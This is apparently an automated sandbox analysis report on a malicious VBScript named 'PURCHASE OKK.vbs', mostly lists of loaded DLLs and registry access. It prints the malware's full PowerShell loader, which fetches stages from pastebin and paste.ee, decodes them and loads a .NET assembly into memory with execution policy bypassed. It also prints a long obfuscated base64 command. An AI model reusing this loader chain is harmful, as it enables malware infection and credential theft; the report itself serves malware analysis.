Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\iexpress.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Source: PURCHASE OKK.vbs | Static file information: File size 35437604 > 1048576
                  Source: Binary string: iexpress.pdbGCTL source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183432718.00000000003FF000.00000002.00000001.01000000.00000006.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2226912501.00000000003FF000.00000002.00000001.01000000.00000006.sdmp
                  Source: Binary string: iexpress.pdb source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQB
P?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?Jw?s?C??Jw?n?D??Jw?n?Cw?I??n?Cc?MQ?n?Cc?L??g?Cc?JwB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod(
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgB
H?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF936862313 pushad ; iretd 7_2_00007FF93686232D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041478D push eax; retf 10_2_004147F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041478D push edx; retn 3E37h 10_2_00414818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041B053 push edx; retf 10_2_0041B067
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00418933 push cs; ret 10_2_00418934
